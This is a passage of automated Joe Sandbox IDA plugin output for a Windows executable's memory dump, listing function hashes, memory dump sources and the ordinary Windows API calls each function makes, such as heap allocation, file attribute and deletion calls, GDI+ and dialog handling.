                                                                  • Opcode ID: 269f8b14934216684cca7f83c860da04209afccdf26960d2a7fc7e76c7eae9f0
                                                                  • Instruction ID: df76a46dc12cdd319187d8648dd2d9c28441b05d9c6c0f732ed04264d8946a1a
                                                                  • Opcode Fuzzy Hash: 269f8b14934216684cca7f83c860da04209afccdf26960d2a7fc7e76c7eae9f0
                                                                  • Instruction Fuzzy Hash: 59112931600301EBD724CA24C846BABB7E9AB05322F504A2FE953D26D1D378ED4DC768
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00478E75
                                                                    • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00491098,004517CE,?,?,00000007,?,?,?,004513D6,?,00000000), ref: 00478EB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocAllocate_free
                                                                  • String ID:
                                                                  • API String ID: 2447670028-0
                                                                  • Opcode ID: e9e3af6eb1ca5ae0e4173a2e33a808f6925ae3af1cc848a23fec85c683206146
                                                                  • Instruction ID: 54ef4145c54135cc47bd04ebda168d7b71542ff27a1551649724b48cc297c070
                                                                  • Opcode Fuzzy Hash: e9e3af6eb1ca5ae0e4173a2e33a808f6925ae3af1cc848a23fec85c683206146
                                                                  • Instruction Fuzzy Hash: FAF0C2322811056ADB312A269C0CBEF37588F91B70B24C52FF81CEA291DF6C8D0181AE
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 004610AB
                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 004610B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Process$AffinityCurrentMask
                                                                  • String ID:
                                                                  • API String ID: 1231390398-0
                                                                  • Opcode ID: e5e6fbf2af8df1ff3b8d0a50f990536bffd7d2c4f650afc3c482875cbdee4f18
                                                                  • Instruction ID: 33cf73e16c22b32c4931164635cf6429de5cba7b0cce8c91e913a6ed7a274a23
                                                                  • Opcode Fuzzy Hash: e5e6fbf2af8df1ff3b8d0a50f990536bffd7d2c4f650afc3c482875cbdee4f18
                                                                  • Instruction Fuzzy Hash: 8BE0D872F01185A7CF098BB49C058EF73DDEA45205728417BE403D3611F938DE414765
                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A501
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A532
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2673547680-0
                                                                  • Opcode ID: 1f8e550eaeaab8deda391f71dda3796c51d8249498abd2f688765b63c92bdd52
                                                                  • Instruction ID: 1d7859a81cef0073fcf37006fe95d688edbe26d4b3d3b44fcdd807dba0b58e12
                                                                  • Opcode Fuzzy Hash: 1f8e550eaeaab8deda391f71dda3796c51d8249498abd2f688765b63c92bdd52
                                                                  • Instruction Fuzzy Hash: 7BF0A03120010D7BDF015F61DC01FDE376CAB0578AF448466BC44E5161EB75DAA8EB64
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641,000000FF), ref: 0045A1F1
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641), ref: 0045A21F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2643169976-0
                                                                  • Opcode ID: 5e92d579bb57dbcfff7790a4252d5761721967e6cd322159229fde19f72f1ce6
                                                                  • Instruction ID: 95cec51447ddc535e60a46f5213d90c2a455c815a62ab2b11015f3d937e68362
                                                                  • Opcode Fuzzy Hash: 5e92d579bb57dbcfff7790a4252d5761721967e6cd322159229fde19f72f1ce6
                                                                  • Instruction Fuzzy Hash: 3EE022311002086BDB019F21EC02FDE339CAF0878BF080466BC04D2151EB65DE98EB58
                                                                  APIs
                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00482641,000000FF), ref: 0046ACB0
                                                                  • CoUninitialize.COMBASE(?,?,?,?,00482641,000000FF), ref: 0046ACB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: GdiplusShutdownUninitialize
                                                                  • String ID:
                                                                  • API String ID: 3856339756-0
                                                                  • Opcode ID: ecef0bc48f786d440bd934f214ada50380ae90c0e02997a91a6aa616861f1e76
                                                                  • Instruction ID: 63130188f7cc5616d70c0e4fcba5bb5f8adc372dd7b5fb3d60eceac64b7d8e25
                                                                  • Opcode Fuzzy Hash: ecef0bc48f786d440bd934f214ada50380ae90c0e02997a91a6aa616861f1e76
                                                                  • Instruction Fuzzy Hash: 74E03072504650EBC6019F5DDD06B49FBA8FB48A20F10466AA41693660DB746800CA99
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,0045A23A,?,0045755C,?,?,?,?), ref: 0045A254
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0045A23A,?,0045755C,?,?,?,?), ref: 0045A280
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2673547680-0
                                                                  • Opcode ID: a0a192080d3180425c193d8ad70606e947de755d242dc0644aaa52057fe9a178
                                                                  • Instruction ID: 5db08c2788fcbf73dfb71ea928c6909833cc297b6d08db3f69908506b2eae076
                                                                  • Opcode Fuzzy Hash: a0a192080d3180425c193d8ad70606e947de755d242dc0644aaa52057fe9a178
                                                                  • Instruction Fuzzy Hash: 20E0ED314001285ACB10AB24CC05BD97B98AB093E6F0002A2BD44E3295D6749E488AAA
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 0046DEEC
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 0046DF03
                                                                    • Part of subcall function 0046B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                    • Part of subcall function 0046B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                    • Part of subcall function 0046B568: IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                    • Part of subcall function 0046B568: TranslateMessage.USER32(?), ref: 0046B5AC
                                                                    • Part of subcall function 0046B568: DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                  • String ID:
                                                                  • API String ID: 2718869927-0
                                                                  • Opcode ID: 4f8dba06b5b4d14185c1199719db4a5cdfb3f362400a3b96f216a572085586c1
                                                                  • Instruction ID: 9bc3c90d45573185aea595497eb42fa9369c07dd5299458961ea52472cb6c727
                                                                  • Opcode Fuzzy Hash: 4f8dba06b5b4d14185c1199719db4a5cdfb3f362400a3b96f216a572085586c1
                                                                  • Instruction Fuzzy Hash: 68E02B7240024826DF01AB66CC06FDE376C5F057CEF04046BB600DB0B3F93CDA50866A
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                  • String ID:
                                                                  • API String ID: 1175261203-0
                                                                  • Opcode ID: 423c1315bbd6aaf73693336d4f2065df27add4fc007b31847a1e42b3b4c5aa7d
                                                                  • Instruction ID: 2f0ff69d1c606d49408c7055e7a6ffd905053d7f7f1fb30d7188f694a1442a0f
                                                                  • Opcode Fuzzy Hash: 423c1315bbd6aaf73693336d4f2065df27add4fc007b31847a1e42b3b4c5aa7d
                                                                  • Instruction Fuzzy Hash: 26E012764001186ADB11AB95DC05FDB77ACEF09796F04046ABA45D2104E678DA848BA4
                                                                  APIs
                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0046A3DA
                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0046A3E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: BitmapCreateFromGdipStream
                                                                  • String ID:
                                                                  • API String ID: 1918208029-0
                                                                  • Opcode ID: fc81a43ff442d3a89f05891b069ba395cd2865aa4a17a0fb9e57068887f990d6
                                                                  • Instruction ID: f9fe491c62b8f3055b8f708b6a34951a7aaf41f3abf1c02c8b4e3ce6a0a95e6c
                                                                  • Opcode Fuzzy Hash: fc81a43ff442d3a89f05891b069ba395cd2865aa4a17a0fb9e57068887f990d6
                                                                  • Instruction Fuzzy Hash: 78E0ED75500218EFCB10DF56C54169DBBE8EB04764F10C45BA846A3301F378AE44DF96
                                                                  APIs
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00472BAA
                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00472BB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                  • String ID:
                                                                  • API String ID: 1660781231-0
                                                                  • Opcode ID: 48c6c8f41d32078d26972bee8cbaae55c9b00618a930f46a26c2d91bba245e59
                                                                  • Instruction ID: ecebc19ff9dca0e3815257477859cceb8bdc9de857fc5d2382cdcfb1321ddf88
                                                                  • Opcode Fuzzy Hash: 48c6c8f41d32078d26972bee8cbaae55c9b00618a930f46a26c2d91bba245e59
                                                                  • Instruction Fuzzy Hash: 6FD0A735154200284C242E722B035C923559D417797B0D69FE02C955C1DADCB240611D
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemShowWindow
                                                                  • String ID:
                                                                  • API String ID: 3351165006-0
                                                                  • Opcode ID: 6e71c19678b42398ba21ba26bff08c5b0c7e47414131c8c2069d2f81ac01e9c4
                                                                  • Instruction ID: a4787c7eb061601442e1742b5b2d8ee43c62b85894b518ee02631fb15a952354
                                                                  • Opcode Fuzzy Hash: 6e71c19678b42398ba21ba26bff08c5b0c7e47414131c8c2069d2f81ac01e9c4
                                                                  • Instruction Fuzzy Hash: BDC0123205C200BFCB010FB9DC09C2BBBACABA5312F04CA28F0A5C0060C238C910DB11
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 01b7831da6a96c58971e05ec74f1c675798c19a243bcb4ec39b78c81f5d16f57
                                                                  • Instruction ID: baa85065139e8322e90a13ce349d9aca2b0f9a9bfb23821db0793b632c40fb32
                                                                  • Opcode Fuzzy Hash: 01b7831da6a96c58971e05ec74f1c675798c19a243bcb4ec39b78c81f5d16f57
                                                                  • Instruction Fuzzy Hash: 2AC1A230A002549BEF15CF68C484BAE7BA5AF05311F0805BFEC459B3A3DB39A94CCB65
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 052870857bfa72ab947d26449948855478e5cae35218fb9f14b28bc9c0a7baef
                                                                  • Instruction ID: 9e2ba5d2de790e7f94a179c288915ab566723441ed1914d39aa1340ec03e5c10
                                                                  • Opcode Fuzzy Hash: 052870857bfa72ab947d26449948855478e5cae35218fb9f14b28bc9c0a7baef
                                                                  • Instruction Fuzzy Hash: 5871B171500B449EDB35DF70C8519EBB7E5AF14346F40092FEAAA87242EA3A664CCF15
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00458289
                                                                    • Part of subcall function 004513DC: __EH_prolog.LIBCMT ref: 004513E1
                                                                    • Part of subcall function 0045A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0045A598
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$CloseFind
                                                                  • String ID:
                                                                  • API String ID: 2506663941-0
                                                                  • Opcode ID: d66a00301321dd410eab65cfa0b2fd24035f3e430f2d3547ede2ee6d7bebc0eb
                                                                  • Instruction ID: 9ec7b46b34f3b3cb8f8cce9143c5b3cb7dfe2e8c2219a0cd5d0df401c6d03500
                                                                  • Opcode Fuzzy Hash: d66a00301321dd410eab65cfa0b2fd24035f3e430f2d3547ede2ee6d7bebc0eb
                                                                  • Instruction Fuzzy Hash: AB41B7719046589ADB20DB61CC55AEAB3B8AF00305F4404EFE84A67193EF795ECDCB14
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004513E1
                                                                    • Part of subcall function 00455E37: __EH_prolog.LIBCMT ref: 00455E3C
                                                                    • Part of subcall function 0045CE40: __EH_prolog.LIBCMT ref: 0045CE45
                                                                    • Part of subcall function 0045B505: __EH_prolog.LIBCMT ref: 0045B50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: c9271ef009a8db66bcc40abec76facaa37b25fe872bcbb8986853538664fcb32
                                                                  • Instruction ID: d1129249129b5a377dcc3644edd3bfe66ad021a7d5edf9b9a2185fbcd57d9cbd
                                                                  • Opcode Fuzzy Hash: c9271ef009a8db66bcc40abec76facaa37b25fe872bcbb8986853538664fcb32
                                                                  • Instruction Fuzzy Hash: 744179B0905B409EE724CF3A8885AE6FBE5BF19304F50492FD5EE83282DB352658CB05
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004513E1
                                                                    • Part of subcall function 00455E37: __EH_prolog.LIBCMT ref: 00455E3C
                                                                    • Part of subcall function 0045CE40: __EH_prolog.LIBCMT ref: 0045CE45
                                                                    • Part of subcall function 0045B505: __EH_prolog.LIBCMT ref: 0045B50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0046B098
                                                                    • Part of subcall function 004513DC: __EH_prolog.LIBCMT ref: 004513E1
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,00483A34), ref: 0047ACF8
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID:
                                                                  • API String ID: 190572456-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  APIs
                                                                    • Part of subcall function 0047B136: RtlAllocateHeap.NTDLL(00000008,00483A34,00000000,?,0047989A,00000001,00000364,?,?,?,0045D984,?,?,?,00000004,0045D710), ref: 0047B177
                                                                  • _free.LIBCMT ref: 0047C4E5
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,00483A34,00000000,?,0047989A,00000001,00000364,?,?,?,0045D984,?,?,?,00000004,0045D710), ref: 0047B177
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  APIs
